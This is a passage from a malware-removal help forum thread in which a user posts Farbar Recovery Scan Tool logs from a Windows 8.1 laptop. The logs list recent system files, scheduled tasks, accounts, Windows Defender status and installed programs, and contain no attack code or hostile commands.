R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-10-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-10-07] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-09 14:28 - 2016-02-09 14:28 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-09 11:48 - 2016-02-09 14:34 - 00000000 ____D C:\FRST
2016-01-31 19:25 - 2016-02-05 13:33 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-28 20:46 - 2016-01-28 20:46 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2016-01-22 18:57 - 2016-01-22 18:57 - 00000000 ____D C:\ProgramData\Unchecky
2016-01-22 18:56 - 2016-01-22 18:56 - 00003996 _____ C:\Windows\System32\Tasks\LaunchPreSignup
2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00023164 _____ C:\Windows\System32\Tasks\{087E0D47-040C-780F-0511-0B09797E117A}
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool
2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonocent Audio Notetaker
2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\Program Files (x86)\Sonocent
2016-01-12 22:03 - 2015-12-10 00:40 - 00033456 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-12 22:03 - 2015-11-17 21:07 - 01380864 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00505344 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-12 20:54 - 2015-12-11 04:38 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-12 20:54 - 2015-12-11 04:00 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-12 20:54 - 2015-12-11 03:55 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-12 20:54 - 2015-12-11 03:50 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-12 20:54 - 2015-12-11 03:45 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-12 20:54 - 2015-12-11 03:21 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-12 20:54 - 2015-12-11 03:18 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-12 20:54 - 2015-12-11 03:09 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-01-12 20:54 - 2015-12-11 03:09 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-12 20:54 - 2015-12-11 03:03 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-12 20:54 - 2015-12-11 02:59 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-12 20:54 - 2015-12-11 02:43 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-12 20:54 - 2015-12-11 02:43 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-01-12 20:54 - 2015-12-11 02:38 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-12 20:54 - 2015-12-11 02:37 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-12 20:54 - 2015-12-11 02:35 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-12 20:54 - 2015-12-11 02:26 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-12 20:54 - 2015-12-11 02:14 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-12 20:54 - 2015-12-11 02:12 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-12 20:54 - 2015-12-11 02:08 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-12 20:54 - 2015-12-11 02:07 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-12 20:53 - 2015-12-30 19:32 - 07453016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-12 20:53 - 2015-12-30 19:32 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-12 20:53 - 2015-12-30 19:32 - 01499912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-12 20:53 - 2015-12-07 10:56 - 01380600 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 02745184 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02528784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02450240 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02447136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02334104 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 02324744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01877504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01798480 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01484888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01288128 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01210200 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 01150232 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 01115640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01037680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00914672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00850680 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00735496 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00700360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00629600 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00584656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00557856 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00498472 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00492736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00463776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00399776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00299080 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00275312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00274280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00248432 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00246856 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00244296 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00229272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00203016 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00184912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00183856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00116720 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00110544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00099136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00090904 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00090392 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00081032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00076936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-12 20:53 - 2015-12-04 15:00 - 01097216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00561952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-01-12 20:53 - 2015-12-03 19:42 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00137968 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-01-12 20:53 - 2015-12-03 19:41 - 00177488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-12 20:53 - 2015-12-03 18:52 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-01-12 20:53 - 2015-12-03 18:52 - 00120376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-12 20:53 - 2015-12-03 18:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-01-12 20:53 - 2015-12-03 18:28 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-12 20:53 - 2015-12-03 18:28 - 00202240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-12 20:53 - 2015-12-03 18:07 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-12 20:53 - 2015-12-03 18:07 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-12 20:53 - 2015-12-03 18:05 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-12 20:53 - 2015-12-03 18:02 - 01664000 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-12 20:53 - 2015-12-03 18:00 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:58 - 00378880 ____C (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-12 20:53 - 2015-12-03 17:51 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-01-12 20:53 - 2015-12-03 17:36 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-12 20:53 - 2015-12-03 17:30 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-12 20:53 - 2015-12-03 17:28 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-12 20:53 - 2015-12-03 17:28 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-12 20:53 - 2015-12-03 17:27 - 00736256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:24 - 01411584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-12 20:53 - 2015-12-03 17:23 - 00402432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:16 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-01-12 20:53 - 2015-12-03 17:13 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-12 20:53 - 2015-12-03 17:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-12 20:53 - 2015-12-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-12 20:53 - 2015-12-03 17:01 - 00743936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-12 20:53 - 2015-12-03 16:45 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-12 20:53 - 2015-12-03 16:40 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-12 20:53 - 2015-12-03 16:29 - 00887296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-12 20:53 - 2015-12-02 15:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-12 20:53 - 2015-12-02 15:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-12 20:52 - 2015-12-08 19:08 - 00685432 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-12 20:52 - 2015-12-08 19:07 - 00507176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-09 14:34 - 2015-12-08 09:24 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1343854479-873069186-2863876452-1002
2016-02-09 14:32 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Packages
2016-02-09 14:31 - 2015-10-07 13:32 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-09 13:39 - 2015-12-14 13:39 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job
2016-02-09 13:38 - 2015-12-14 13:38 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job
2016-02-09 10:04 - 2015-12-08 10:21 - 00000000 ____D C:\ProgramData\TEMP
2016-02-09 10:00 - 2015-12-08 11:54 - 00003950 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{D813D5A7-8FB5-485D-B469-BE69E474CFFF}
2016-02-09 09:57 - 2015-12-14 14:01 - 00000000 __RDO C:\Users\Molly Poole\OneDrive
2016-02-09 09:57 - 2015-10-07 13:32 - 00000920 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-07 23:56 - 2013-08-22 13:36 - 00000000 ____D C:\Windows\Inf
2016-02-07 22:55 - 2013-08-22 14:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-07 22:54 - 2013-08-22 13:25 - 00524288 ___SH C:\Windows\system32\config\BBI
2016-02-07 20:32 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\AppReadiness
2016-02-05 13:37 - 2015-12-08 10:47 - 00003108 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002
2016-02-05 13:33 - 2015-10-07 13:32 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-05 13:27 - 2015-12-08 11:20 - 00000000 ____D C:\ProgramData\Claro Software
2016-02-04 13:39 - 2015-10-07 11:34 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-02-02 04:26 - 2015-10-07 13:32 - 00003896 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 04:26 - 2015-10-07 13:32 - 00003660 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 15:04 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Claro Software
2016-02-01 15:04 - 2015-12-08 11:20 - 00000000 ____D C:\Program Files (x86)\Claro Software
2016-02-01 15:03 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\regid.2004-06.com.clarosoftware
2016-02-01 13:14 - 2015-12-08 09:18 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Google
2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-01-28 20:45 - 2015-12-08 10:30 - 00000000 ____D C:\Program Files\Microsoft Office
2016-01-24 23:10 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole
2016-01-24 20:00 - 2013-08-22 15:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-22 21:29 - 2015-12-14 21:42 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Adobe
2016-01-22 18:10 - 2015-12-08 10:17 - 00000000 ____D C:\ProgramData\Nuance
2016-01-22 14:12 - 2015-12-08 10:24 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Apple Computer
2016-01-22 14:12 - 2014-11-22 01:00 - 00992588 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-19 13:41 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\rescache
2016-01-19 12:50 - 2015-12-08 10:30 - 00002457 _____ C:\Users\Public\Desktop\Sonocent Audio Notetaker.lnk
2016-01-19 12:00 - 2015-12-08 11:55 - 00001235 _____ C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT
2016-01-18 22:07 - 2015-10-07 13:33 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-01-18 22:06 - 2015-10-07 13:33 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-13 21:40 - 2015-10-07 13:08 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-13 21:40 - 2014-11-22 05:15 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-13 18:21 - 2013-08-22 15:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-13 18:20 - 2015-10-07 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-13 18:17 - 2015-10-07 13:00 - 00000000 ____D C:\Windows\system32\MRT
2016-01-13 18:14 - 2015-10-07 13:00 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2015-12-08 11:55 - 2016-01-19 12:00 - 0001235 _____ () C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-05 17:12
 
==================== End of FRST.txt =========================


#5
moles926

    Member

  • Topic Starter
  • 15 posts
Additional scan result of Farbar Recovery Scan Tool (x64) Version:07-02-2016
Ran by Molly Poole (2016-02-09 14:34:59)
Running from D:\Users\Molly Poole\Desktop
Windows 8.1 Pro (X64) (2015-12-08 09:17:34)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1343854479-873069186-2863876452-500 - Administrator - Disabled)
Guest (S-1-5-21-1343854479-873069186-2863876452-501 - Limited - Disabled)
Molly (S-1-5-21-1343854479-873069186-2863876452-1003 - Limited - Enabled) => C:\Users\Molly
Molly Poole (S-1-5-21-1343854479-873069186-2863876452-1002 - Administrator - Enabled) => C:\Users\Molly Poole
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{C5815ACF-FD34-4553-8A22-C7411B7E662B}) (Version: 4.1.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{CBF12D2F-CF64-4CB7-858B-2C1F21068E5F}) (Version: 4.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9840 - Broadcom Corporation)
Claro AudioNote (HKLM-x32\...\{69EA9C44-A9B7-4C55-9146-575FFABF856E}) (Version: 1.1.12 - Claro Software)
Claro Voice Setup (HKLM-x32\...\{F2E70DB4-344B-44BC-8840-DD5BA4B9CE13}) (Version: 1.1.2 - Claro Software)
ClaroCapture (HKLM-x32\...\{8B7C91A0-A204-4800-9925-C4D27D1F7F61}) (Version: 3.0.31 - Claro Software)
ClaroIdeas (HKLM-x32\...\{10D5763B-475D-4E7C-B7A0-7E19CDB535A3}) (Version: 2.1.4 - Claro Software)
ClaroRead Pro (HKLM-x32\...\{3674C7AF-C8F7-4672-97EB-13E72DBEC8D1}) (Version: 7.0.16 - Claro Software)
Dragon NaturallySpeaking 13 (HKLM-x32\...\{33EA20FB-5389-4938-BA59-2BCD9BB68F41}) (Version: 13.00.000 - Nuance Communications Inc.)
Easy Photo Scan (HKLM-x32\...\{1A6DED1E-A024-455D-AA82-203D6B3B0CBC}) (Version: 1.00.0006 - Seiko Epson Corporation)
Epson Connect Printer Setup (HKLM-x32\...\{D9B1D51B-EB56-410D-AEB5-1CCFAC4B6C8C}) (Version: 1.3.0 - SEIKO EPSON CORPORATION)
Epson Easy Photo Print 2 (HKLM-x32\...\{07AA1C7F-E8CA-4FDC-B975-BC9EBC22B6DE}) (Version: 2.7.0.0 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{17FA0444-A025-43B9-862C-81AE6307C2F2}) (Version: 3.10.0050 - Seiko Epson Corporation)
Epson E-Web Print (HKLM-x32\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON Manuals (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.50.0.0 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON XP-322 323 325 Series Printer Uninstall (HKLM\...\EPSON XP-322 323 325 Series) (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (HKLM\...\{15A0F113-BF2C-4C12-8AA8-42AE0D9AE1C9}) (Version: 3.1.2.0 - SEIKO EPSON Corporation)
Google Chrome (HKLM-x32\...\{01EF2457-B546-3A54-8F9A-065EA5221A9C}) (Version: 48.0.2564.103 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company)
Inspiration 9 IE (HKLM-x32\...\Inspiration 9 IE) (Version:  - )
Inspiration 9 PDF Driver (novaPDF 7.3 printer) (HKLM\...\Inspiration 9 PDF Driver_is1) (Version:  - Softland)
Intel® Chipset Device Software (x32 Version: 10.0.22 - Intel® Corporation) Hidden
iTunes (HKLM\...\{0D44E3A4-6C3D-45D7-B443-079509E5BE5D}) (Version: 12.3.2.35 - Apple Inc.)
Microsoft Office Home and Business 2016 - en-us (HKLM\...\HomeBusinessRetail - en-us) (Version: 16.0.6366.2062 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\OneDriveSetup.exe) (Version: 17.3.6301.0127 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
